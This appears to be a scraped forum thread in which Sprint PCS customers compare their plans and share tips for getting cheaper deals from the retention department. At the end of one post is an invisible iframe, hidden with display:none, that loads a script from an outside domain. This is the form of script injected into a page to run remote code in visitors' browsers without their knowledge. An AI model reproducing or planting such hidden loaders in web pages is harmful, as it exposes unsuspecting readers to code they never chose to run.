+ Reply to Thread
    i300 knucklehead

Is this a decent deal?

I need some help here... It is so freaking confusing.
    AM I paying way too much for all this?

Currently my plan is the following:

6000 MINUTES FOR $59.99
    600 ANYTIME MINUTES
    5400 NIGHT AND WEEKEND MINUTES
    WIRELESS WEB & VOICE COMMAND
    CALLER ID, CALL WAITING
    THREE-WAY CALLING
    SPRINT PCS VOICEMAIL

EQUIPMENT REPLACEMENT $4
    ADD-A-PHONE $30 (two extra phones)

I have three lines, and the bill goes to around $115 per month. Can I save significantly by changing plans? We use just about all the 600 anytime minutes monthly, but I don't need much in the way of N&W minutes.

Is there any cost to be saved anywhere here? The CSR's are totally unhelpfull and clueless at this, but all the talk of Retention plans makes me wonder if I can save some cash big time.

I would say that your chances of getting a better deal through retentions is very good (based on the fact that I have never called them and not walked away with something). I doubt they would want to lose a 3 phone account.

One thing is for sure.... it certainly can't hurt for you to try, right? I'd be very surprised if you aren't posting later that you've gotten a plan that blows away your current one. Good luck!

i300 knucklehead

Talking Yes!!!

Called the retention dept... here is my new plan. They told me I couldn't get some of the good deals because I use a shared plan, but I did get a better deal. As long as they get it straight...

800 Anytime/5200 N&W (9pm)
    500 PCS-PCS Minutes
    Wireless Web
    Voice Command

All for $79.00 for three lines. I'm happy - thanks for all the help!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Yes!!!

Originally posted by patwoods
    Called the retention dept... here is my new plan. They told me I couldn't get some of the good deals because I use a shared plan, but I did get a better deal. As long as they get it straight...

800 Anytime/5200 N&W (9pm)
    500 PCS-PCS Minutes
    Wireless Web
    Voice Command

All for $79.00 for three lines. I'm happy - thanks for all the help!
    I knew you could do it! It's sweet when you can get a better plan AND significantly cut the costs

not bad Pat.... the cool thing to me is that the retention deals haven't washed up with 3G. But hey man..... where's your 'per megabyte' cost.....wut?...Pat not jumpin on the 3G bandwagon?.......lol....jk dood, neither am I....yet.
    .....beam me up Scotty...

Originally posted by petewat
    not bad Pat.... the cool thing to me is that the retention deals haven't washed up with 3G. But hey man..... where's your 'per megabyte' cost.....wut?...Pat not jumpin on the 3G bandwagon?.......lol....jk dood, neither am I....yet.
    It will be interesting to start hearing of the first 3G "retentions" deals. When the 7135 comes out I am going to want unlimited data, and I'm going to want my total plan cost to come in at around $150. If the unlimited data will be $99 then for $50 (which is what I pay now) I will have to be able to get enough minutes to allow me to use as much talktime as I do now. But since more than half of my minutes are currently used for data I might not be so hard to please with data taken out of the equation.

i300 knucklehead
    Originally posted by petewat
    But hey man..... where's your 'per megabyte' cost.....wut?...Pat not jumpin on the 3G bandwagon?..
    With a baby on the way, my concern right now was to cut costs. I don't see myself going 3G any time in the near future. To be honest I use the phone as a Palm first, Phone second, and waaay in back (2% of the time maybe) I use it for wireless access. Mostly to check my email from the road.

At this point 3G is a waste on me.

At this point 3G is a waste on me
    I hear ya brutha....... me too.
    .....beam me up Scotty...

laxplayer003

Red face also s/w csr for new deal

not sure if i got a deal or not......1200 anytime for 79.99....currently using 300 web and about 600-700 talk min....so w/o any change in use i'm ok...went to easy...is this a good deal....thanks....laxplayer003:o

I get 1300 anytime and 3000 N/W for $49.99/month. This is one of Sprint's standard retention plans.

laxplayer003

Unhappy will call this am for new plan

marty...nice plan...how long have u had......will be calling this am for the amrty plan....will let u know how i make out....msw

Re: will call this am for new plan

Originally posted by laxplayer003
    marty...nice plan...how long have u had......will be calling this am for the amrty plan....will let u know how i make out....msw
    Don't forget to go for the first incoming minute free! And 8PM start for N&W. And 500 PCS to PCS.

i300 knucklehead
    I tried to get them to give me N&W starting at 8pm, and first incoming minute free, but I was told my plan did not allow for those. Probably cause I have three lines on the plan.

The 8pm time difference doesn't matter to me anyhow, as I only generally use the phone during the late afternoon/early evening hours.. but that 1st minute thing sounds really nice.

Oh well, still got a much better deal this time.

laxplayer003

Smile s/w retention people-new plan

just got off the phone / doris...been in the ret area for over 1 year....asked about the marty plan...see post above.....said i was crazy...not able to copy.....old plan according to doris.....she was able to offer the following:

1500 anytime
    3000 n/w 8pm
    500 pcs to pcs

for 75.00

currently pay 79.99 for 1200 anytime..see post above.....changed plans

i300 knucklehead

last time...

Well, they managed to remove my Voice Command. I called them today and they flat out told me it wasn't possible to add it to the plan I now have. So I asked for first incoming minute free and they gave me that in place of it.

Question how do you do retention?

I have seen ppl talk about this, how is this done? Who do I call? Any help is sought...!

oh here is what I'm paying

My Plan Summary:

2000 MINUTES FOR $49.99
    $49.99 FREE & CLEAR PLAN
    ALL MINUTES INCLUDE LONG DISTANCE
    400 ANYTIME MINUTES
    1600 NIGHT AND WEEKEND MINUTES
    NIGHTS: M-TH 8PM-7AM WKND: F 8PM-M 7AM
    CALLER ID, CALL WAITING
    THREE-WAY CALLING
    SPRINT PCS VOICEMAIL

I know I can do better than this, I hardly use any N&W minutes, I'd like to have 200 more Anytime minutes, maybe free incoming minute too.
    Thanks for any help

Cool You Can Do Better

As I have posted in the past,

650 anytime min.
    3000 off peak

nw start time at 8pm (very important if you are always waiting til 9pm)

$35.99

Wireless Web $5 with first 3 months free

Call "Clare" and say "cancel service". Let person know that you are unhappy and you know better deals are available. (if not with Sprint, then with other carriers)

Be nice but firm - call back if needed, not everyone will give you a deal.

There are other deals if you want to pay more.

You will need to agree to a 1 year contract.

Good Luck...Brad